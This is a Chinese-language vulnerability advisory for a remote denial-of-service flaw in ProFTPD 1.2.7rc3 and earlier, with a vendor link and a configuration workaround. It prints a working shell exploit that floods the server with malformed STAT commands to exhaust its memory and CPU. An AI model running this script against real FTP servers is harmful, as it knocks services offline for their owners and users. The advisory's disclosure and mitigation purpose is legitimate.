ProFTPD 畸形STAT指令参数远程DoS缺陷

ProFTPD 畸形STAT指令参数远程DoS缺陷

 

图-ProFTPD

ProFTPD 畸形STAT指令参数远程DoS缺陷：

涉及程序：

ProFTPD 1.2.7

描述：

ProFTPD 畸形STAT指令参数远程DoS缺陷

详细：

ProFTPD是Unix和Linux操作系统下的源代码开放的FTP服务程序。

ProFTPD对用户递交的STAT指令参数缺乏正确过滤，当攻击者向ProFTPD服务程序提交参数中含有多个'/*'字符的STAT指令时，将会导致FTP服务崩溃，拒绝服务。

受影响系统：

ProFTPD 1.2.7 rc3 及所有之前版本

攻击方法：

#!/bin/sh  
 
# proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least  
 
# might work against many other FTP daemons  
 
# consumes nearly all memory and alot of CPU  
 
# tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3  
 
# 7-dec-02 - detach - www.duho.org  
 
# use: ./prodos.sh   
 
# do this some more to make sure the system eventually dies  
 
cnt=25  
 
while [ $cnt -gt 0 ] ; do 
 
ftp -n << EOF&  
 
o $1  
 
quote user $2  
 
quote pass $3  
 
quote stat /*/*/*/*/*/*/*  
 
quit  
 
EOF  
 
let cnt=cnt-1  
 
done  
 
sleep 2  
 
killall -9 ftp  
 
echo DONE!  
 
#end  
 

解决方案：

目前厂商还没有提供补丁或升级程序，建议用户随时关注厂商站点：

http://www.proftpd.org

临时解决方案：

* 在文件'proftpd.conf'中添加如下一行(目前暂时还没有经过测试)：

DenyFilter \*.*/

通过正文，我们可以清楚的知道ProFTPD出错错在哪里，赶快修正去吧！

• proftpd支持上传sfv校验的方法
• FTP服务 Proftpd + mysql + quota
• 使用MySQL认证ProFTPD用户需要什么
• Proftpd中Limit的使用
• ProFTPD服务器安全策略
• Proftpd 大虾的学习笔记
• ProFTPD 详细解析